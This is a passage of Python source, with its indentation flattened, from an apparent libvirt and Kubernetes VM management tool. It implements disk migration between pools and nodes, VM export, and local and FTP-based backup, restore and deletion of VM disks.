# prepare all disk
specs = get_disks_spec(params.domain)
vmVols = []
for disk_path in list(specs.keys()):
prepare_info = get_disk_prepare_info_by_path(disk_path)
vmVols.append(prepare_info['disk'])
vps = []
migrateVols = []
notReleaseVols = []
for line in params.migratedisks.split(';'):
vp = {}
vol = None
pool = None
for arg in line.split(','):
if arg.split('=')[0] == 'vol':
vol = arg.split('=')[1]
if arg.split('=')[0] == 'pool':
pool = arg.split('=')[1]
if vol and pool:
logger.debug('1519: %s' % vol)
prepare_info = get_disk_prepare_info_by_path(vol)
source_pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# ignore
if prepare_info['pool'] == pool:
continue
target_pool_info = get_pool_info_from_k8s(pool)
# check_pool_active(target_pool_info)
migrateVols.append(vol)
notReleaseVols.append(prepare_info['disk'])
vp['disk'] = prepare_info['disk']
vp['vol'] = prepare_info['path']
vp['pool'] = pool
vp['oldpool'] = prepare_info['pool']
vps.append(vp)
else:
raise ExecuteException('RunCmdError', 'migratedisks param is illegal.')
uuid = randomUUID().replace('-', '')
xmlfile = '/tmp/%s.xml' % uuid
logger.debug("xmlfile: %s" % xmlfile)
op = Operation('virsh dumpxml %s > %s' % (params.domain, xmlfile), {})
op.execute()
# get disk node label in ip
node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
logger.debug('vps: ' + dumps(vps))
if params.ip in get_host_IP():
# not migrate vm, just migrate some disk to other pool
for disk_path in list(specs.keys()):
# prepare
prepare_info = get_disk_prepare_info_by_path(disk_path)
logger.debug(specs)
try:
for vp in vps:
vol = vp['disk']
logger.debug('migrate disk %s to %s.' % (vol, vp['pool']))
migrateDiskFunc(vol, vp['pool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except Exception as e:
for vp in vps:
try:
vol = vp['disk']
logger.debug('error occur, migrate disk %s to %s.' % (vol, vp['oldpool']))
disk_info = get_vol_info_from_k8s(vol)
if disk_info['pool'] != vp['oldpool']:
migrateDiskFunc(vol, vp['oldpool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except:
pass
raise e
op = Operation('virsh define %s' % xmlfile, {})
op.execute()
modifyVMOnNode(params.domain)
success_print("migrate vm disk %s successful." % params.domain, {})
else:
# migrate vm to another node
if node_name:
# for disk_path in specs.keys():
# # prepare
# prepare_info = get_disk_prepare_info_by_path(disk_path)
# if disk_path not in migrateVols:
# # remote prepare
# remote_prepare_disk_by_path(params.ip, prepare_info['path'])
all_jsondicts = []
logger.debug(specs)
try:
for disk_path in list(specs.keys()):
if disk_path not in migrateVols:
prepare_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
# check_pool_active(pool_info)
pools = get_pools_by_path(pool_info['path'])
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
remote_start_pool(params.ip, targetPool)
if targetPool:
logger.debug("targetPool is %s." % targetPool)
if pool_info['pooltype'] in ['localfs', 'nfs', 'glusterfs', 'vdiskfs']:
prepare_disk_by_path(prepare_info['path'])
config = get_disk_config(pool_info['poolname'], prepare_info['disk'])
write_config(config['name'], config['dir'], config['current'], targetPool,
config['poolname'])
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
jsondicts = get_disk_jsondict(targetPool, prepare_info['disk'])
all_jsondicts.extend(jsondicts)
else:
raise ExecuteException('', 'can not find pool has same poolname %s on %s' % (pool_info['poolname'], params.ip))
remote_prepare_disk_by_path(params.ip, prepare_info['path'])
else:
logger.debug(vps)
logger.debug('migrate disks')
for vp in vps:
vol = get_disk_prepare_info_by_path(vp['vol'])['disk']
logger.debug('migrate disk %s to %s.' % (vol, vp['pool']))
migrateDiskFunc(vol, vp['pool'])
disk_info = get_vol_info_from_k8s(vol)
if not modofy_vm_disk_file(xmlfile, vp['vol'], disk_info['current']):
raise ExecuteException('RunCmdError', 'Can not change vm disk file.')
except ExecuteException as e:
for vp in vps:
try:
pool_active(vp['oldpool'])
migrateDiskFunc(vp['disk'], vp['oldpool'])
except:
logger.debug(traceback.format_exc())
logger.debug(traceback.format_exc())
raise e
try:
try:
delete_vm_cdrom_file_in_xml(xmlfile)
except:
pass
op = Operation('scp %s root@%s:%s' % (xmlfile, params.ip, xmlfile), {})
op.execute()
op = Operation('virsh define %s' % xmlfile, {}, ip=params.ip, remote=True)
op.execute()
try:
op = Operation('virsh start %s' % params.domain, {}, ip=params.ip, remote=True)
op.execute()
except:
pass
except ExecuteException as e:
try:
op = Operation('virsh undefine %s' % params.domain, {}, ip=params.ip, remote=True)
op.execute()
except:
pass
for vp in vps:
try:
migrateDiskFunc(vp['disk'], vp['oldpool'])
except:
logger.debug(traceback.format_exc())
logger.debug(traceback.format_exc())
raise e
for vol in vmVols:
if vol not in notReleaseVols:
# release
release_disk_by_metadataname(vol)
apply_all_jsondict(all_jsondicts)
op = Operation('kubesds-adm modifyVM --domain %s' % params.domain, {}, ip=params.ip, remote=True,
with_result=True)
result = op.execute()
if result['result']['code'] != 0:
raise ExecuteException('RunCmdError', 'can not modify vm on k8s.')
vmHelper = K8sHelper('VirtualMachine')
vmHelper.change_node(params.domain, node_name)
op = Operation('virsh undefine %s' % params.domain, {})
op.execute()
success_print("migrate vm disk %s successful." % params.domain, {})
else:
error_print(1, 'can not migrate vm disk, can not find target node.')
def exportVM(params):
if not is_vm_exist(params.domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % params.domain)
target_path = '%s/%s' % (params.path, params.domain)
if not os.path.exists(target_path):
os.makedirs(target_path)
# save vm xml file
op = Operation('virsh dumpxml %s > %s/%s.xml' % (params.domain, target_path, params.domain), {})
op.execute()
disk_specs = get_disks_spec(params.domain)
for disk_path in list(disk_specs.keys()):
disk_info = get_disk_prepare_info_by_path(disk_path)
pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(pool_info)
disk_path = disk_info['path']
if pool_info['pooltype'] == 'localfs':
if not os.path.exists(disk_path):
raise ExecuteException('', 'vm disk file %s not exist, plz check it.' % disk_path)
dest = '%s/%s' % (target_path, os.path.basename(disk_path))
# snapshot
op1 = Operation('cp -f %s %s' % (disk_path, dest), {})
op1.execute()
qemu_info = get_disk_info(dest)
if 'full_backing_filename' in list(qemu_info.keys()):
disk_format = qemu_info['format']
op2 = Operation('qemu-img rebase -f %s -b "" %s' % (disk_format, dest), {})
op2.execute()
success_print("success exportVM.", {})
def backupDisk(params):
disk_heler = K8sHelper('VirtualMachineDisk')
disk_heler.delete_lifecycle(params.vol)
backup_helper = K8sHelper('VirtualMachineBackup')
if backup_helper.exist(params.version):
raise ExecuteException('', 'backup %s has exist, plz use another version. plz check it.' % params.version)
logger.debug('params!!!!')
logger.debug(params)
if params.full:
full_version = params.version
backup_vm_disk(params.domain, params.pool, params.vol, params.version, params.full, None, False)
else:
full_version = get_disk_backup_current(params.domain, params.pool, params.vol)
logger.debug(full_version)
backup_vm_disk(params.domain, params.pool, params.vol, params.version, params.full, None, False)
data = {
'domain': params.domain,
'pool': params.pool,
'time': time.time(),
'disk': params.vol,
'full': full_version
}
backup_helper.create(params.version, 'backup', data)
backup_helper.add_label(params.version, params.domain)
if params.remote:
push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port,
params.username, params.password)
success_print("success backupDisk.", {})
def backup_vm_disk(domain, pool, disk, version, is_full, full_version, is_backup_VM):
# check vm exist or not
if not is_vm_exist(domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % domain)
disk_info = get_vol_info_from_k8s(disk)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_specs = get_disks_spec(domain)
vm_disks = {}
disk_tag = {}
for disk_path in list(disk_specs.keys()):
disk_mn = try_get_diskmn_by_path(disk_path)
vm_disks[disk_mn] = disk_path
disk_tag[disk_mn] = disk_specs[disk_path]
if disk not in list(vm_disks.keys()):
raise ExecuteException('', 'domain not attach diak %s, can find disk %s used by domain %s xml.' % (
disk, disk, domain))
# check backup version exist or not
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
history_file_path = '%s/history.json' % disk_backup_dir
if is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'disk %s backup version %s has exist, plz use another version.' % (
disk, version))
# do vm snapshots
uuid = randomUUID().replace('-', '')
cmd = 'virsh snapshot-create-as --domain %s --name %s --atomic --disk-only --no-metadata ' % (domain, uuid)
disk_prepare(disk_info['poolname'], disk, disk_info['uni'])
disk_dir = '%s/%s' % (disk_pool_info['path'], disk)
ss_path = '%s/%s' % (disk_dir, uuid)
cmd = '%s --diskspec %s,snapshot=external,file=%s,driver=qcow2' % (cmd, disk_specs[vm_disks[disk]], ss_path)
for disk_path in list(disk_specs.keys()):
if disk_path != vm_disks[disk]:
cmd = '%s --diskspec %s,snapshot=no' % (cmd, disk_specs[disk_path])
if not os.path.exists(disk_dir):
raise ExecuteException('', 'vm disk %s dir %s not exist, plz check it.' % (disk, disk_dir))
op = Operation(cmd, {})
op.execute()
# backup disk dir
if full_version: # vm backup, use vm full version
current_full_version = full_version
else:
if is_full:
current_full_version = version
else:
current_full_version = get_disk_backup_current(domain, pool, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
backup_dir = '%s/%s' % (disk_backup_dir, current_full_version)
backed_disk_file = []
try:
chain, backed_disk_file = backup_snapshots_chain(ss_path, backup_dir)
# write backup record
if not os.path.exists(history_file_path):
history = {}
else:
with open(history_file_path, 'r') as f:
history = load(f)
if current_full_version not in list(history.keys()):
history[current_full_version] = {}
count = len(list(history[current_full_version].keys()))
chain['index'] = count + 1
chain['time'] = time.time()
history[current_full_version][version] = chain
if not is_backup_VM:
history['current'] = current_full_version
with open(history_file_path, 'w') as f:
dump(history, f)
except ExecuteException as e:
try:
for df in backed_disk_file:
op = Operation('rm -f %s' % df, {})
op.execute()
except:
pass
raise e
finally:
# change disk current
# change_vol_current(disk, ss_path)
base = None
if os.path.exists(ss_path):
base = DiskImageHelper.get_backing_file(ss_path)
if base and os.path.exists(base):
if is_vm_active(domain):
op = Operation(
'virsh blockcommit --domain %s %s --base %s --pivot --active' % (domain, disk_tag[disk], base),
{})
op.execute()
else:
op = Operation('qemu-img commit -b %s %s' % (base, ss_path), {})
op.execute()
change_vm_os_disk_file(domain, ss_path, base)
try:
op = Operation('rm -f %s' % ss_path, {})
op.execute()
pool_info = get_pool_info_from_k8s(pool)
config = get_disk_config(pool_info['poolname'], disk)
write_config(disk, disk_dir, base, config['pool'], config['poolname'])
modify_disk_info_in_k8s(config['poolname'], disk)
except:
pass
return backed_disk_file
def restore_vm_disk(domain, pool, disk, version, newname, target):
if newname and target is None:
raise ExecuteException('', 'newname and target must be set together.' % domain)
# check vm exist or not
if not newname and not is_vm_exist(domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % domain)
if not newname and is_vm_active(domain):
raise ExecuteException('', 'domain %s is still running. plz stop it first.' % domain)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
raise ExecuteException('', 'not exist disk %s backup dir %s' % (disk, disk_backup_dir))
# check backup version exist or not
history_file_path = '%s/history.json' % disk_backup_dir
if not is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'not exist disk %s backup version in history file %s' % (disk, history_file_path))
with open(history_file_path, 'r') as f:
history = load(f)
full_version = get_full_version(domain, pool, disk, version)
if newname:
if newname is None or target is None:
raise ExecuteException('', 'new disk name or target pool must be set.')
disk_heler = K8sHelper('VirtualMachineDisk')
if disk_heler.exist(newname):
raise ExecuteException('', 'new disk %s has exist' % newname)
disk_pool_info = get_pool_info_from_k8s(target)
check_pool_active(disk_pool_info)
if not os.path.exists(disk_pool_info['path']):
raise ExecuteException('', 'not exist pool %s mount path %s.' % (target, disk_pool_info['path']))
new_disk_dir = '%s/%s' % (disk_pool_info['path'], newname)
if not os.path.exists(new_disk_dir):
os.mkdir(new_disk_dir)
disk_back_dir = '%s/%s/diskbackup' % (disk_backup_dir, full_version)
backupRecord = history[full_version][version]
current, file_to_delete = restore_snapshots_chain(disk_back_dir, backupRecord, new_disk_dir)
write_config(newname, os.path.dirname(current), current, target, disk_pool_info['poolname'])
disk_heler.create(newname, "volume", get_disk_info_to_k8s(disk_pool_info['poolname'], newname))
else:
disk_info = get_vol_info_from_k8s(disk)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
disk_specs = get_disks_spec(domain)
vm_disks = {}
for disk_path in list(disk_specs.keys()):
disk_mn = try_get_diskmn_by_path(disk_path)
vm_disks[disk_mn] = disk_path
if disk not in list(vm_disks.keys()):
raise ExecuteException('', 'domain not attach diak %s, can find disk %s used by domain %s xml.' % (
disk, disk, domain))
# do vm snapshots
disk_back_dir = '%s/%s/diskbackup' % (disk_backup_dir, full_version)
disk_dir = '%s/%s' % (disk_pool_info['path'], disk_info['disk'])
# restore disk dir
backupRecord = history[full_version][version]
current, file_to_delete = restore_snapshots_chain(disk_back_dir, backupRecord, disk_dir)
# change vm disk
modofy_vm_disks(domain, {vm_disks[disk]: current})
# change disk current
change_vol_current(disk, current)
for file in file_to_delete:
runCmd('rm -f %s' % file)
return current
def restoreDisk(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
if params.targetDomain:
if not is_vm_exist(params.targetDomain):
raise ExecuteException('', 'target domain %s will be attached new disk not set.')
current = restore_vm_disk(params.domain, params.pool, params.vol, params.version, params.newname, params.target)
# attach vm disk
if params.targetDomain:
attach_vm_disk(params.targetDomain, current)
success_print("success restoreDisk.", {})
def backupVM(params):
backup_helper = K8sHelper('VirtualMachineBackup')
if backup_helper.exist(params.version):
raise ExecuteException('', 'backup %s has exist, plz use another version. plz check it.' % params.version)
if not is_vm_exist(params.domain):
raise ExecuteException('', 'domain %s is not exist. plz check it.' % params.domain)
if params.remote:
if is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username,
params.password):
raise ExecuteException('', 'domain %s has exist backup version %s in ftp server. plz check it.' % (
params.domain, params.version))
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
history_file_path = '%s/history.json' % backup_dir
if is_vm_backup_exist(params.domain, params.pool, params.version):
raise ExecuteException('', 'domain %s has exist backup version %s in %s. plz check it.' % (
params.domain, params.version, history_file_path))
disk_tags = {}
disk_specs = get_disks_spec(params.domain)
# do vm snapshots
os_disk_tag, os_disk_path = get_os_disk(params.domain)
for disk_path in list(disk_specs.keys()):
if not params.all and disk_specs[disk_path] != os_disk_tag:
continue
disk_mn = try_get_diskmn_by_path(disk_path)
disk_info = get_vol_info_from_k8s(disk_mn)
disk_pool_info = get_pool_info_from_k8s(disk_info['pool'])
check_pool_active(disk_pool_info)
disk_prepare(disk_info['poolname'], disk_info['disk'], disk_info['uni'])
disk_dir = '%s/%s' % (disk_pool_info['path'], disk_info['disk'])
if not os.path.exists(disk_dir):
raise ExecuteException('', 'vm disk dir %s not exist, plz check it.' % disk_dir)
disk_tags[disk_mn] = disk_specs[disk_path]
history = {}
if os.path.exists(history_file_path):
with open(history_file_path, 'r') as f:
history = load(f)
disk_full_version = None
newestV = None
if not params.full:
if len(list(history.keys())) == 0:
raise ExecuteException('', 'domain %s not exist full backup version %s in %s. plz check it.' % (
params.domain, params.version, history_file_path))
btime = 0.0
for v in list(history.keys()):
not_match = False
for disk in disk_tags:
if disk not in list(history[v].keys()):
not_match = True
if not_match:
continue
for disk in list(history[v].keys()):
if history[v][disk]['time'] > btime:
btime = history[v][disk]['time']
newestV = v
if newestV is None:
raise ExecuteException('', 'can not find all disk full backup record, maybe you should make a full backup')
disk_full_version = {}
for disk in list(history[newestV].keys()):
disk_full_version[disk] = history[newestV][disk]['full']
# check domain all disk has full backup
if not params.full:
for disk in list(disk_tags.keys()):
if disk not in list(disk_full_version.keys()):
raise ExecuteException('', 'vm %s disk %s may be first attach, plz make full backup firstly.' % (
params.domain, disk))
if not disk_tags:
raise ExecuteException('', 'not exist disk need to backup.')
# save vm xml file
xml_file = '%s/%s.xml' % (backup_dir, params.version)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
op = Operation('virsh dumpxml %s > %s' % (params.domain, xml_file), {})
op.execute()
delete_vm_cdrom_file_in_xml(xml_file)
# backup disk
all_backed_disk_file = []
disk_version = {}
try:
for disk in list(disk_tags.keys()):
uuid = randomUUID().replace('-', '')
disk_version[disk] = uuid
if disk_full_version:
logger.debug('disk_full_version')
logger.debug(disk_full_version)
backed_disk_file = backup_vm_disk(params.domain, params.pool, disk, uuid, params.full,
disk_full_version[disk], True)
else:
backed_disk_file = backup_vm_disk(params.domain, params.pool, disk, uuid, True, None, True)
if backed_disk_file and isinstance(backed_disk_file, list):
all_backed_disk_file.extend(backed_disk_file)
history[params.version] = {}
for disk in list(disk_version.keys()):
if disk_full_version:
history[params.version][disk] = {
'time': time.time(),
'tag': disk_tags[disk],
'version': disk_version[disk],
'full': disk_full_version[disk]
}
else:
history[params.version][disk] = {
'time': time.time(),
'tag': disk_tags[disk],
'version': disk_version[disk],
'full': disk_version[disk]
}
if newestV:
history[params.version][disk]['vm_full'] = history[newestV][disk]['vm_full']
else:
history[params.version][disk]['vm_full'] = params.version
with open(history_file_path, 'w') as f:
dump(history, f)
except Exception as e:
try:
for disk in list(disk_version.keys()):
try:
delete_disk_backup(params.domain, params.pool, disk, disk_version[disk])
logger.debug('backup vm %s fail, delete backuped disk %s version %s' % (
params.domain, disk, disk_version[disk]))
except:
pass
except:
pass
try:
del history[params.version]
with open(history_file_path, 'w') as f:
dump(history, f)
except:
pass
try:
logger.debug('all_backed_disk_file: %s' % dumps(all_backed_disk_file))
for df in all_backed_disk_file:
op = Operation('rm -f %s' % df, {})
op.execute()
except:
pass
logger.debug(traceback.format_exc())
raise e
if params.remote:
# history file
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
if ftp.is_exist_file(ftp_history_file):
ftp_history = ftp.get_json_file_data(ftp_history_file)
else:
ftp_history = {}
# upload file
fin = []
record = history[params.version]
try:
for disk in list(record.keys()):
push_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote,
params.port, params.username, params.password)
fin.append(disk)
ftp.upload_file(xml_file, '/vmbackup/%s' % params.domain)
except Exception as e:
for disk in fin:
delete_remote_disk_backup(params.domain, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
for disk in list(record.keys()):
delete_disk_backup(params.domain, params.pool, disk, record[disk]['version'])
del history[params.version]
with open(history_file_path, 'w') as f:
dump(history, f)
logger.debug(traceback.format_exc())
raise ExecuteException('', 'can not upload backup record to ftp server.')
ftp_history[params.version] = history[params.version]
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file("/tmp/history.json", '/vmbackup/%s' % params.domain)
data = {
'domain': params.domain,
'pool': params.pool,
'time': time.time(),
'disk': '',
'version': params.version
}
if newestV:
data['full'] = newestV
else:
data['full'] = params.version
backup_helper.create(params.version, 'backup', data)
backup_helper.add_label(params.version, params.domain)
success_print("success backupVM.", {})
def restoreVM(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
if not params.newname and is_vm_active(params.domain):
raise ExecuteException('', 'vm %s is still active, plz stop it first.' % params.domain)
# default backup path
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
history_file = '%s/history.json' % backup_dir
if not is_vm_backup_exist(params.domain, params.pool, params.version):
raise ExecuteException('', 'domain %s not has backup %s, location: %s.' % (
params.domain, params.version, history_file))
disk_version = {}
with open(history_file, 'r') as f:
history = load(f)
record = history[params.version]
for disk in list(record.keys()):
disk_version[disk] = record[disk]['version']
if is_vm_exist(params.domain):
disk_specs = get_disks_spec(params.domain)
else:
disk_specs = get_disks_spec_by_xml('%s/%s.xml' % (backup_dir, params.version))
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug("debugcode")
logger.debug(dumps(pool_info))
# be sure vm still use the disks in the backup record.
vm_disks = []
for disk_path in list(disk_specs.keys()):
vm_disk = try_get_diskmn_by_path(disk_path)
vm_disks.append(vm_disk)
if params.all:
for disk in list(disk_version.keys()):
if disk not in vm_disks:
raise ExecuteException('', 'some disk in backup %s has not been attached in domain %s.' % (
dumps(disk_version), params.domain))
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
vm_xml_file = '%s/%s.xml' % (backup_dir, params.version)
os_disk_tag, os_disk_path = get_os_disk_by_xml(vm_xml_file)
# restore vm disk snapshot chain
for disk in list(record.keys()):
if not params.all and record[disk]['tag'] != os_disk_tag:
continue
disk_info = get_vol_info_from_k8s(disk)
disk_prepare(disk_info['poolname'], disk, disk_info['uni'])
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
# restore vm disk snapshot chain
disk_currents = {}
for disk in list(disk_version.keys()):
if not params.all and record[disk]['tag'] != os_disk_tag:
continue
if params.newname:
if record[disk]['tag'] == os_disk_tag:
newdisk = params.newname
else:
newdisk = randomUUID().replace('-', '')
current = restore_vm_disk(params.domain, params.pool, disk, disk_version[disk], newdisk, params.target)
else:
current = restore_vm_disk(params.domain, params.pool, disk, disk_version[disk], None, None)
disk_currents[disk] = current
if params.newname:
# current.
source_to_target = {}
disk_specs = get_disks_spec_by_xml(vm_xml_file)
logger.debug(disk_version)
logger.debug(disk_specs)
logger.debug(disk_currents)
for name in list(disk_version.keys()):
for disk_path in list(disk_specs.keys()):
if disk_path.find(name) >= 0 and name in list(disk_currents.keys()):
logger.debug(dumps(disk_currents))
logger.debug(name)
source_to_target[disk_path] = disk_currents[name]
break
define_and_restore_vm_disks(vm_xml_file, params.newname, source_to_target)
logger.debug("debugcode")
pool_info = get_pool_info_from_k8s(params.pool)
logger.debug(dumps(pool_info))
success_print("success restoreVM.", {})
def delete_disk_backup(domain, pool, disk, version):
# default backup path
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
full_version = get_full_version(domain, pool, disk, version)
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(backup_dir):
return
# raise ExecuteException('', 'disk %s not has backup %s, location: %s.' % (
# disk, version, backup_dir))
history_file = '%s/history.json' % backup_dir
if not os.path.exists(history_file):
return
# raise ExecuteException('', 'can not find disk %s backup record %s' % (disk, version))
checksum_to_deletes = []
with open(history_file, 'r') as f:
history = load(f)
for chain in history[full_version][version]['chains']:
checksum_to_deletes.append(chain['checksum'])
# be sure disk backup not used by other backup record.
for v in list(history[full_version].keys()):
if v == version:
continue
chains = history[full_version][v]['chains']
for chain in chains:
if chain['checksum'] in checksum_to_deletes:
checksum_to_deletes.remove(chain['checksum'])
disk_backup_dir = '%s/%s/diskbackup' % (backup_dir, full_version)
checksum_file = '%s/checksum.json' % disk_backup_dir
if os.path.exists(checksum_file):
with open(checksum_file, 'r') as f:
checksums = load(f)
for checksum in checksum_to_deletes:
file_path = '%s/%s' % (disk_backup_dir, checksums[checksum])
runCmd('rm -f %s' % file_path)
del checksums[checksum]
with open(checksum_file, 'w') as f:
dump(checksums, f)
with open(history_file, 'r') as f:
history = load(f)
del history[full_version][version]
if len(list(history[full_version].keys())) == 0:
del history[full_version]
runCmd('rm -rf %s/%s' % (backup_dir, full_version))
if len(list(history.keys())) == 0 or (len(list(history.keys())) == 1 and 'current' in list(history.keys())):
runCmd('rm -rf %s' % backup_dir)
else:
with open(history_file, 'w') as f:
dump(history, f)
def delete_vm_backup(domain, pool, version):
# default backup path
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
history_file_path = '%s/history.json' % backup_dir
if not is_vm_backup_exist(domain, pool, version):
return
# raise ExecuteException('', 'domain %s not exist backup version %s in %s. plz check it.' % (
# domain, version, history_file_path))
disk_version = {}
with open(history_file_path, 'r') as f:
history = load(f)
record = history[version]
for disk in list(record.keys()):
disk_version[disk] = record[disk]['version']
for disk in list(disk_version.keys()):
delete_disk_backup(domain, pool, disk, disk_version[disk])
try:
op = Operation('rm -f %s/%s.xml' % (backup_dir, version), {})
op.execute()
except:
pass
del history[version]
if len(list(history.keys())) == 0:
runCmd("rm -f %s" % history_file_path)
else:
with open(history_file_path, 'w') as f:
dump(history, f)
def deleteVMBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
delete_vm_backup(params.domain, params.pool, params.version)
try:
backup_helper = K8sHelper('VirtualMachineBackup')
backup_helper.delete(params.version)
except:
pass
success_print("success deleteVMBackup.", {})
def deleteVMDiskBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
delete_disk_backup(params.domain, params.pool, params.vol, params.version)
try:
backup_helper = K8sHelper('VirtualMachineBackup')
backup_helper.delete(params.version)
except:
pass
success_print("success deleteVMDiskBackup.", {})
def deleteRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# default backup path
if params.vol:
delete_remote_disk_backup(params.domain, params.vol, params.version, params.remote, params.port,
params.username, params.password)
else:
delete_remote_vm_backup(params.domain, params.version, params.remote, params.port, params.username,
params.password)
success_print("success deleteRemoteBackup.", {})
def delete_remote_disk_backup(domain, disk, version, remote, port, username, password):
if not remote or not port or not username or not password:
raise ExecuteException('', 'ftp port, username, password must be set.')
ftp = FtpHelper(remote, port, username, password)
backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
history_file = '%s/history.json' % backup_dir
logger.debug('history_file: ' + history_file)
if not ftp.is_exist_file(history_file):
return
# raise ExecuteException('',
# 'can not find disk %s backup record %s in ftp server' % (disk, version))
history = ftp.get_json_file_data(history_file)
full_version = get_full_version_by_history(disk, version, history)
if full_version not in list(history.keys()) or version not in list(history[full_version].keys()):
return
# raise ExecuteException('',
# 'can not find disk %s backup record %s in ftp server' % (disk, version))
record = history[full_version][version]
chains = record['chains']
checksum_to_deletes = []
for chain in chains:
checksum_to_deletes.append(chain['checksum'])
for v in list(history[full_version].keys()):
if v == version:
continue
chains = history[full_version][v]['chains']
for chain in chains:
if chain['checksum'] in checksum_to_deletes:
checksum_to_deletes.remove(chain['checksum'])
disk_backup_dir = '%s/%s/diskbackup' % (backup_dir, full_version)
checksum_file = '%s/checksum.json' % disk_backup_dir
checksums = ftp.get_json_file_data(checksum_file)
logger.debug(checksums)
logger.debug(checksum_to_deletes)
for checksum in checksum_to_deletes:
file_path = '%s/%s' % (disk_backup_dir, checksums[checksum])
ftp.delete_file(file_path)
del checksums[checksum]
tmp_file = '/tmp/checksum.json'
with open(tmp_file, 'w') as f:
dump(checksums, f)
ftp.upload_file(tmp_file, disk_backup_dir)
del history[full_version][version]
if len(list(history[full_version].keys())) == 0:
del history[full_version]
ftp.delete_dir('%s/%s' % (backup_dir, full_version))
if len(list(history.keys())) == 0 or (len(list(history.keys())) == 1 and 'current' in list(history.keys())):
ftp.delete_dir(backup_dir)
else:
tmp_file = '/tmp/history.json'
with open(tmp_file, 'w') as f:
dump(history, f)
ftp.upload_file(tmp_file, backup_dir)
def delete_remote_vm_backup(domain, version, remote, port, username, password):
ftp = FtpHelper(remote, port, username, password)
history_file = '/vmbackup/%s/history.json' % domain
history = ftp.get_json_file_data(history_file)
if not history or version not in list(history.keys()):
return
# raise ExecuteException('', 'not exist vm %s backup record version %s in %s. ' % (
# domain, version, history_file))
record = history[version]
for disk in list(record.keys()):
if disk == 'current':
continue
delete_remote_disk_backup(domain, disk, record[disk]['version'], remote, port,
username, password)
history_file = '/vmbackup/%s/history.json' % domain
history = ftp.get_json_file_data(history_file)
del history[version]
if len(list(history.keys())) == 0:
ftp.delete_file(history_file)
else:
tmp_file = '/tmp/history.json'
with open(tmp_file, 'w') as f:
dump(history, f)
ftp.upload_file(tmp_file, '/vmbackup/%s' % domain)
ftp.delete_file('/vmbackup/%s/%s.xml' % (domain, version))
def pushVMBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
